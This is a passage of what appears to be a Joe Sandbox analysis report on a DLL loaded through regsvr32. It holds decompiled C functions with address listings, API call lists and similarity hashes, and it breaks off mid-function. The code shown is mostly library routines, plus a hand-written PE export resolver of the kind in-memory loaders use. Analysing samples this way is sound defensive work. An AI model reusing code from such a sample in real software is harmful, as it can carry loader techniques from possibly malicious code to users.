                                                                                                          • Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 4273134663-0
                                                                                                        • Opcode ID: 2b79ff425e09df3a26b2ab50ef16ba7c17b80cb00167e4224560e412a4786cd9
                                                                                                        • Instruction ID: fa7108181993de9b8ea87dd6eaa7291c2451852d429ff63cadea9d36e3b3e8b2
                                                                                                        • Opcode Fuzzy Hash: 2b79ff425e09df3a26b2ab50ef16ba7c17b80cb00167e4224560e412a4786cd9
                                                                                                        • Instruction Fuzzy Hash: 3901C0B6A00228ABE711DB65DCC4FDF77ACEF18790F110065EA45D7141DA70DE848BA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 90%
                                                                                                        			E10010C0F(void* __ebx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                        				intOrPtr _v0;
                                                                                                        				intOrPtr _v4;
                                                                                                        				void* __esi;
                                                                                                        				struct HINSTANCE__* _t16;
                                                                                                        				_Unknown_base(*)()* _t17;
                                                                                                        				void* _t25;
                                                                                                        				void* _t26;
                                                                                                        				void* _t28;
                                                                                                        
                                                                                                        				_t28 = __eflags;
                                                                                                        				_t24 = __edi;
                                                                                                        				_t21 = __ebx;
                                                                                                        				E1001431B(__ebx, _t25, __ebp, 0xc);
                                                                                                        				_push(E100100DE);
                                                                                                        				_t26 = E100139F5(__ebx, 0x1005a8e0, __edi, _t25, _t28);
                                                                                                        				_t29 = _t26;
                                                                                                        				if(_t26 == 0) {
                                                                                                        					E1000A0DB(_t21, 0x1005a8e0, __edi, _t26, _t29);
                                                                                                        				}
                                                                                                        				_t30 =  *(_t26 + 8);
                                                                                                        				if( *(_t26 + 8) != 0) {
                                                                                                        					L7:
                                                                                                        					E10014388(0xc);
                                                                                                        					return  *(_t26 + 8)(_v4, _v0, _a4, _a8);
                                                                                                        				} else {
                                                                                                        					_push("hhctrl.ocx");
                                                                                                        					_t16 = E1000E725(_t21, 0x1005a8e0, _t24, _t26, _t30);
                                                                                                        					 *(_t26 + 4) = _t16;
                                                                                                        					if(_t16 != 0) {
                                                                                                        						_t17 = GetProcAddress(_t16, "HtmlHelpA");
                                                                                                        						__eflags = _t17;
                                                                                                        						 *(_t26 + 8) = _t17;
                                                                                                        						if(_t17 != 0) {
                                                                                                        							goto L7;
                                                                                                        						}
                                                                                                        						FreeLibrary( *(_t26 + 4));
                                                                                                        						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
                                                                                                        					}
                                                                                                        					return 0;
                                                                                                        				}
                                                                                                        			}











                                                                                                        0x10010c0f
                                                                                                        0x10010c0f
                                                                                                        0x10010c0f
                                                                                                        0x10010c12
                                                                                                        0x10010c17
                                                                                                        0x10010c26
                                                                                                        0x10010c28
                                                                                                        0x10010c2a
                                                                                                        0x10010c2c
                                                                                                        0x10010c2c
                                                                                                        0x10010c31
                                                                                                        0x10010c35
                                                                                                        0x10010c6f
                                                                                                        0x10010c71
                                                                                                        0x00000000
                                                                                                        0x10010c37
                                                                                                        0x10010c37
                                                                                                        0x10010c3c
                                                                                                        0x10010c44
                                                                                                        0x10010c47
                                                                                                        0x10010c53
                                                                                                        0x10010c59
                                                                                                        0x10010c5b
                                                                                                        0x10010c5e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010c63
                                                                                                        0x10010c69
                                                                                                        0x10010c69
                                                                                                        0x00000000
                                                                                                        0x10010c49

                                                                                                        APIs
                                                                                                          • Part of subcall function 1001431B: EnterCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014357
                                                                                                          • Part of subcall function 1001431B: InitializeCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014366
                                                                                                          • Part of subcall function 1001431B: LeaveCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014373
                                                                                                          • Part of subcall function 1001431B: EnterCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 1001437F
                                                                                                          • Part of subcall function 100139F5: __EH_prolog3_catch.LIBCMT ref: 100139FC
                                                                                                          • Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
                                                                                                          • Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC
                                                                                                        • GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 10010C53
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 10010C63
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                                        • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                        • API String ID: 2853499158-63838506
                                                                                                        • Opcode ID: 70501895dbc1ad2a0e808d427635024ad07f3595ed01fbc2665ff07db8d8f757
                                                                                                        • Instruction ID: 8873b40b3358b87e9332ca8c9146562190e137befea279647b799a71fcd87530
                                                                                                        • Opcode Fuzzy Hash: 70501895dbc1ad2a0e808d427635024ad07f3595ed01fbc2665ff07db8d8f757
                                                                                                        • Instruction Fuzzy Hash: 7001F431204303DFE321DFA1DE05B4A76E0EF05781F018A08F4DAA8061DBB1D8D0DBA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 65%
                                                                                                        			E100224E9() {
                                                                                                        				signed long long _v12;
                                                                                                        				signed int _v20;
                                                                                                        				signed long long _v28;
                                                                                                        				signed char _t8;
                                                                                                        
                                                                                                        				_t8 = GetModuleHandleA("KERNEL32");
                                                                                                        				if(_t8 == 0) {
                                                                                                        					L6:
                                                                                                        					_v20 =  *0x1002bb98;
                                                                                                        					_v28 =  *0x1002bb90;
                                                                                                        					asm("fsubr qword [ebp-0x18]");
                                                                                                        					_v12 = _v28 / _v20 * _v20;
                                                                                                        					asm("fld1");
                                                                                                        					asm("fcomp qword [ebp-0x8]");
                                                                                                        					asm("fnstsw ax");
                                                                                                        					if((_t8 & 0x00000005) != 0) {
                                                                                                        						return 0;
                                                                                                        					} else {
                                                                                                        						return 1;
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                                                                        					if(__eax == 0) {
                                                                                                        						goto L6;
                                                                                                        					} else {
                                                                                                        						_push(0);
                                                                                                        						return __eax;
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}







                                                                                                        0x100224ee
                                                                                                        0x100224f6
                                                                                                        0x1002250d
                                                                                                        0x100224b9
                                                                                                        0x100224c2
                                                                                                        0x100224ce
                                                                                                        0x100224d1
                                                                                                        0x100224d4
                                                                                                        0x100224d6
                                                                                                        0x100224d9
                                                                                                        0x100224de
                                                                                                        0x100224e8
                                                                                                        0x100224e0
                                                                                                        0x100224e4
                                                                                                        0x100224e4
                                                                                                        0x100224f8
                                                                                                        0x100224fe
                                                                                                        0x10022506
                                                                                                        0x00000000
                                                                                                        0x10022508
                                                                                                        0x10022508
                                                                                                        0x1002250c
                                                                                                        0x1002250c
                                                                                                        0x10022506

                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32,1001A130), ref: 100224EE
                                                                                                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 100224FE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                        • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                        • API String ID: 1646373207-3105848591
                                                                                                        • Opcode ID: 3c78fa25cbee28e165ffdeda389deaa1f92564da871b159ff165506123a88fa1
                                                                                                        • Instruction ID: b1380c49f8d15cda8b98f9f56e3724ed638b8beb480886d8724856f67b077174
                                                                                                        • Opcode Fuzzy Hash: 3c78fa25cbee28e165ffdeda389deaa1f92564da871b159ff165506123a88fa1
                                                                                                        • Instruction Fuzzy Hash: EDF03030900D1EE2EF00ABE1BC596AF7A78FB44785FD20490E681B0088DF7181718681
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10002D50(intOrPtr __ecx, intOrPtr* _a4, signed int _a8) {
                                                                                                        				intOrPtr _v8;
                                                                                                        				signed int _v12;
                                                                                                        				intOrPtr* _v16;
                                                                                                        				intOrPtr _v20;
                                                                                                        				intOrPtr _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				intOrPtr* _v32;
                                                                                                        				signed short* _v36;
                                                                                                        				intOrPtr _v40;
                                                                                                        				void* _t79;
                                                                                                        				void* _t119;
                                                                                                        
                                                                                                        				_v40 = __ecx;
                                                                                                        				_v20 =  *((intOrPtr*)(_a4 + 4));
                                                                                                        				_v12 = 0;
                                                                                                        				_v16 =  *_a4 + 0x78;
                                                                                                        				if( *((intOrPtr*)(_v16 + 4)) != 0) {
                                                                                                        					_v8 = _v20 +  *_v16;
                                                                                                        					if( *((intOrPtr*)(_v8 + 0x18)) == 0 ||  *((intOrPtr*)(_v8 + 0x14)) == 0) {
                                                                                                        						SetLastError(0x7f);
                                                                                                        						return 0;
                                                                                                        					} else {
                                                                                                        						if((_a8 >> 0x00000010 & 0x0000ffff) != 0) {
                                                                                                        							_v32 = _v20 +  *((intOrPtr*)(_v8 + 0x20));
                                                                                                        							_v36 = _v20 +  *((intOrPtr*)(_v8 + 0x24));
                                                                                                        							_v24 = 0;
                                                                                                        							_v28 = 0;
                                                                                                        							while(_v28 <  *((intOrPtr*)(_v8 + 0x18))) {
                                                                                                        								_t79 = E10001F70(_a8, _v20 +  *_v32);
                                                                                                        								_t119 = _t119 + 8;
                                                                                                        								if(_t79 != 0) {
                                                                                                        									_v28 = _v28 + 1;
                                                                                                        									_v32 = _v32 + 4;
                                                                                                        									_v36 =  &(_v36[1]);
                                                                                                        									continue;
                                                                                                        								}
                                                                                                        								_v12 =  *_v36 & 0x0000ffff;
                                                                                                        								_v24 = 1;
                                                                                                        								break;
                                                                                                        							}
                                                                                                        							if(_v24 != 0) {
                                                                                                        								L17:
                                                                                                        								if(_v12 <=  *((intOrPtr*)(_v8 + 0x14))) {
                                                                                                        									return _v20 +  *((intOrPtr*)(_v20 +  *((intOrPtr*)(_v8 + 0x1c)) + _v12 * 4));
                                                                                                        								}
                                                                                                        								SetLastError(0x7f);
                                                                                                        								return 0;
                                                                                                        							}
                                                                                                        							SetLastError(0x7f);
                                                                                                        							return 0;
                                                                                                        						}
                                                                                                        						if((_a8 & 0xffff) >=  *((intOrPtr*)(_v8 + 0x10))) {
                                                                                                        							_v12 = (_a8 & 0xffff) -  *((intOrPtr*)(_v8 + 0x10));
                                                                                                        							goto L17;
                                                                                                        						}
                                                                                                        						SetLastError(0x7f);
                                                                                                        						return 0;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				SetLastError(0x7f);
                                                                                                        				return 0;
                                                                                                        			}














                                                                                                        0x10002d56
                                                                                                        0x10002d5f
                                                                                                        0x10002d62
                                                                                                        0x10002d71
                                                                                                        0x10002d7b
                                                                                                        0x10002d94
                                                                                                        0x10002d9e
                                                                                                        0x10002dab
                                                                                                        0x00000000
                                                                                                        0x10002db8
                                                                                                        0x10002dc3
                                                                                                        0x10002e0b
                                                                                                        0x10002e17
                                                                                                        0x10002e1a
                                                                                                        0x10002e21
                                                                                                        0x10002e45
                                                                                                        0x10002e5d
                                                                                                        0x10002e62
                                                                                                        0x10002e67
                                                                                                        0x10002e30
                                                                                                        0x10002e39
                                                                                                        0x10002e42
                                                                                                        0x00000000
                                                                                                        0x10002e42
                                                                                                        0x10002e6f
                                                                                                        0x10002e72
                                                                                                        0x00000000
                                                                                                        0x10002e72
                                                                                                        0x10002e81
                                                                                                        0x10002e8f
                                                                                                        0x10002e98
                                                                                                        0x00000000
                                                                                                        0x10002eb5
                                                                                                        0x10002e9c
                                                                                                        0x00000000
                                                                                                        0x10002ea2
                                                                                                        0x10002e85
                                                                                                        0x00000000
                                                                                                        0x10002e8b
                                                                                                        0x10002dd7
                                                                                                        0x10002dfa
                                                                                                        0x00000000
                                                                                                        0x10002dfa
                                                                                                        0x10002ddb
                                                                                                        0x00000000
                                                                                                        0x10002de1
                                                                                                        0x10002d9e
                                                                                                        0x10002d7f
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • SetLastError.KERNEL32(0000007F), ref: 10002D7F
                                                                                                        • SetLastError.KERNEL32(0000007F), ref: 10002DAB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 1452528299-0
                                                                                                        • Opcode ID: 4d3452531a7c5fa1c81c99bf09ef5018cf44bb84df21a50ba64e81c18ec72dd0
                                                                                                        • Instruction ID: 028074866867044f4bb64f701422ec5252acdb94d91fdee864382ef112f730bb
                                                                                                        • Opcode Fuzzy Hash: 4d3452531a7c5fa1c81c99bf09ef5018cf44bb84df21a50ba64e81c18ec72dd0
                                                                                                        • Instruction Fuzzy Hash: F7510570A4415AEFEF04CF94C880AAEB7F1FF48384F608569D855AB349D734EA41DB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10023E83(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                        				char _v8;
                                                                                                        				signed int _v12;
                                                                                                        				char _v20;
                                                                                                        				char _t43;
                                                                                                        				char _t46;
                                                                                                        				signed int _t53;
                                                                                                        				signed int _t54;
                                                                                                        				intOrPtr _t56;
                                                                                                        				intOrPtr _t57;
                                                                                                        				int _t58;
                                                                                                        				signed short* _t59;
                                                                                                        				short* _t60;
                                                                                                        				int _t65;
                                                                                                        				char* _t72;
                                                                                                        
                                                                                                        				_t72 = _a8;
                                                                                                        				if(_t72 == 0 || _a12 == 0) {
                                                                                                        					L5:
                                                                                                        					return 0;
                                                                                                        				} else {
                                                                                                        					if( *_t72 != 0) {
                                                                                                        						E10016E2B( &_v20, __edi, _a16);
                                                                                                        						_t43 = _v20;
                                                                                                        						__eflags =  *(_t43 + 0x14);
                                                                                                        						if( *(_t43 + 0x14) != 0) {
                                                                                                        							_t46 = E1001E243( *_t72 & 0x000000ff,  &_v20);
                                                                                                        							__eflags = _t46;
                                                                                                        							if(_t46 == 0) {
                                                                                                        								__eflags = _a4;
                                                                                                        								_t40 = _v20 + 4; // 0x840ffff8
                                                                                                        								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                                        								if(__eflags != 0) {
                                                                                                        									L10:
                                                                                                        									__eflags = _v8;
                                                                                                        									if(_v8 != 0) {
                                                                                                        										_t53 = _v12;
                                                                                                        										_t11 = _t53 + 0x70;
                                                                                                        										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                                                        										__eflags =  *_t11;
                                                                                                        									}
                                                                                                        									return 1;
                                                                                                        								}
                                                                                                        								L21:
                                                                                                        								_t54 = E10017D62(__eflags);
                                                                                                        								 *_t54 = 0x2a;
                                                                                                        								__eflags = _v8;
                                                                                                        								if(_v8 != 0) {
                                                                                                        									_t54 = _v12;
                                                                                                        									_t33 = _t54 + 0x70;
                                                                                                        									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                                        									__eflags =  *_t33;
                                                                                                        								}
                                                                                                        								return _t54 | 0xffffffff;
                                                                                                        							}
                                                                                                        							_t56 = _v20;
                                                                                                        							_t15 = _t56 + 0xac; // 0xa045ff98
                                                                                                        							_t65 =  *_t15;
                                                                                                        							__eflags = _t65 - 1;
                                                                                                        							if(_t65 <= 1) {
                                                                                                        								L17:
                                                                                                        								_t24 = _t56 + 0xac; // 0xa045ff98
                                                                                                        								__eflags = _a12 -  *_t24;
                                                                                                        								if(__eflags < 0) {
                                                                                                        									goto L21;
                                                                                                        								}
                                                                                                        								__eflags = _t72[1];
                                                                                                        								if(__eflags == 0) {
                                                                                                        									goto L21;
                                                                                                        								}
                                                                                                        								L19:
                                                                                                        								__eflags = _v8;
                                                                                                        								_t27 = _t56 + 0xac; // 0xa045ff98
                                                                                                        								_t57 =  *_t27;
                                                                                                        								if(_v8 == 0) {
                                                                                                        									return _t57;
                                                                                                        								}
                                                                                                        								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                                        								return _t57;
                                                                                                        							}
                                                                                                        							__eflags = _a12 - _t65;
                                                                                                        							if(_a12 < _t65) {
                                                                                                        								goto L17;
                                                                                                        							}
                                                                                                        							__eflags = _a4;
                                                                                                        							_t21 = _t56 + 4; // 0x840ffff8
                                                                                                        							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                                        							__eflags = _t58;
                                                                                                        							_t56 = _v20;
                                                                                                        							if(_t58 != 0) {
                                                                                                        								goto L19;
                                                                                                        							}
                                                                                                        							goto L17;
                                                                                                        						}
                                                                                                        						_t59 = _a4;
                                                                                                        						__eflags = _t59;
                                                                                                        						if(_t59 != 0) {
                                                                                                        							 *_t59 =  *_t72 & 0x000000ff;
                                                                                                        						}
                                                                                                        						goto L10;
                                                                                                        					} else {
                                                                                                        						_t60 = _a4;
                                                                                                        						if(_t60 != 0) {
                                                                                                        							 *_t60 = 0;
                                                                                                        						}
                                                                                                        						goto L5;
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}

















                                                                                                        0x10023e8b
                                                                                                        0x10023e92
                                                                                                        0x10023ea7
                                                                                                        0x00000000
                                                                                                        0x10023e99
                                                                                                        0x10023e9b
                                                                                                        0x10023eb3
                                                                                                        0x10023eb8
                                                                                                        0x10023ebb
                                                                                                        0x10023ebe
                                                                                                        0x10023ee7
                                                                                                        0x10023eec
                                                                                                        0x10023ef0
                                                                                                        0x10023f71
                                                                                                        0x10023f83
                                                                                                        0x10023f8c
                                                                                                        0x10023f8e
                                                                                                        0x10023ece
                                                                                                        0x10023ece
                                                                                                        0x10023ed1
                                                                                                        0x10023ed3
                                                                                                        0x10023ed6
                                                                                                        0x10023ed6
                                                                                                        0x10023ed6
                                                                                                        0x10023ed6
                                                                                                        0x00000000
                                                                                                        0x10023edc
                                                                                                        0x10023f50
                                                                                                        0x10023f50
                                                                                                        0x10023f55
                                                                                                        0x10023f5b
                                                                                                        0x10023f5e
                                                                                                        0x10023f60
                                                                                                        0x10023f63
                                                                                                        0x10023f63
                                                                                                        0x10023f63
                                                                                                        0x10023f63
                                                                                                        0x00000000
                                                                                                        0x10023f67
                                                                                                        0x10023ef2
                                                                                                        0x10023ef5
                                                                                                        0x10023ef5
                                                                                                        0x10023efb
                                                                                                        0x10023efe
                                                                                                        0x10023f25
                                                                                                        0x10023f28
                                                                                                        0x10023f28
                                                                                                        0x10023f2e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10023f30
                                                                                                        0x10023f33
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10023f35
                                                                                                        0x10023f35
                                                                                                        0x10023f38
                                                                                                        0x10023f38
                                                                                                        0x10023f3e
                                                                                                        0x10023eac
                                                                                                        0x10023eac
                                                                                                        0x10023f47
                                                                                                        0x00000000
                                                                                                        0x10023f47
                                                                                                        0x10023f00
                                                                                                        0x10023f03
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10023f07
                                                                                                        0x10023f15
                                                                                                        0x10023f18
                                                                                                        0x10023f1e
                                                                                                        0x10023f20
                                                                                                        0x10023f23
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10023f23
                                                                                                        0x10023ec0
                                                                                                        0x10023ec3
                                                                                                        0x10023ec5
                                                                                                        0x10023ecb
                                                                                                        0x10023ecb
                                                                                                        0x00000000
                                                                                                        0x10023e9d
                                                                                                        0x10023e9d
                                                                                                        0x10023ea2
                                                                                                        0x10023ea4
                                                                                                        0x10023ea4
                                                                                                        0x00000000
                                                                                                        0x10023ea2
                                                                                                        0x10023e9b

                                                                                                        APIs
                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 10023EB3
                                                                                                        • __isleadbyte_l.LIBCMT ref: 10023EE7
                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000000,?,00000000,10022C1D,?,?,00000002), ref: 10023F18
                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000000,?,00000000,10022C1D,?,?,00000002), ref: 10023F86
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                        • String ID:
                                                                                                        • API String ID: 3058430110-0
                                                                                                        • Opcode ID: 9fecb1cfdfc7269cf4ddeba3d560e390ad46f881d90bbc81769201c589544707
                                                                                                        • Instruction ID: bc0a73e0192d900c1d89498958e44598309ec6eeb61669affd2269eacaf1277d
                                                                                                        • Opcode Fuzzy Hash: 9fecb1cfdfc7269cf4ddeba3d560e390ad46f881d90bbc81769201c589544707
                                                                                                        • Instruction Fuzzy Hash: EA319931A0028AEFDF50DFA4E891AAE7BF9EF00251F92C5A9F4648B191D330E944DB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 82%
                                                                                                        			E100145B9(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int _a4) {
                                                                                                        				void* __ebx;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				intOrPtr _t29;
                                                                                                        				intOrPtr _t32;
                                                                                                        				intOrPtr _t35;
                                                                                                        				intOrPtr _t36;
                                                                                                        				intOrPtr _t37;
                                                                                                        				signed int _t39;
                                                                                                        				void* _t47;
                                                                                                        				intOrPtr* _t48;
                                                                                                        				void* _t50;
                                                                                                        				void* _t51;
                                                                                                        				void* _t64;
                                                                                                        				void* _t65;
                                                                                                        				intOrPtr _t66;
                                                                                                        				void* _t68;
                                                                                                        				void* _t70;
                                                                                                        
                                                                                                        				_t65 = __edi;
                                                                                                        				_t64 = __edx;
                                                                                                        				_t51 = E1000D61F(_t50, __ecx, __edi, _t68, __eflags);
                                                                                                        				_t29 =  *((intOrPtr*)(_t51 + 0x10));
                                                                                                        				if(_t29 == 0) {
                                                                                                        					L19:
                                                                                                        					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
                                                                                                        				}
                                                                                                        				_t32 = _t29 - 1;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
                                                                                                        				if(_t32 != 0) {
                                                                                                        					goto L19;
                                                                                                        				}
                                                                                                        				if(_a4 == 0) {
                                                                                                        					L8:
                                                                                                        					_push(_t65);
                                                                                                        					_t66 =  *((intOrPtr*)(E1000D5EC(_t51, _t65, 0, _t77) + 4));
                                                                                                        					_t70 = E100139DB(0x10058f44);
                                                                                                        					if(_t70 == 0 || _t66 == 0) {
                                                                                                        						L18:
                                                                                                        						goto L19;
                                                                                                        					} else {
                                                                                                        						_t35 =  *((intOrPtr*)(_t70 + 0xc));
                                                                                                        						_t80 = _t35;
                                                                                                        						if(_t35 == 0) {
                                                                                                        							L12:
                                                                                                        							if( *((intOrPtr*)(_t66 + 0x98)) != 0) {
                                                                                                        								_t36 =  *((intOrPtr*)(_t70 + 0xc));
                                                                                                        								_a4 = _a4 & 0x00000000;
                                                                                                        								_t83 = _t36;
                                                                                                        								if(_t36 != 0) {
                                                                                                        									_push(_t36);
                                                                                                        									_t39 = E1001A023(_t51, _t64, _t66, _t70, _t83);
                                                                                                        									_push( *((intOrPtr*)(_t70 + 0xc)));
                                                                                                        									_a4 = _t39;
                                                                                                        									E10016380(_t51, _t66, _t70, _t83);
                                                                                                        								}
                                                                                                        								_t37 = E1001703B(_t51, _t64, _t66, _t70,  *((intOrPtr*)(_t66 + 0x98)));
                                                                                                        								 *((intOrPtr*)(_t70 + 0xc)) = _t37;
                                                                                                        								if(_t37 == 0 && _a4 != _t37) {
                                                                                                        									 *((intOrPtr*)(_t70 + 0xc)) = E1001703B(_t51, _t64, _t66, _t70, _a4);
                                                                                                        								}
                                                                                                        							}
                                                                                                        							goto L18;
                                                                                                        						}
                                                                                                        						_push(_t35);
                                                                                                        						if(E1001A023(_t51, _t64, _t66, _t70, _t80) >=  *((intOrPtr*)(_t66 + 0x98))) {
                                                                                                        							goto L18;
                                                                                                        						}
                                                                                                        						goto L12;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				if(_a4 != 0xffffffff) {
                                                                                                        					_t47 = E1000B510();
                                                                                                        					if(_t47 != 0) {
                                                                                                        						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
                                                                                                        						_t77 = _t48;
                                                                                                        						if(_t48 != 0) {
                                                                                                        							 *_t48(0, 0);
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        				E100144ED( *((intOrPtr*)(_t51 + 0x20)), _t65);
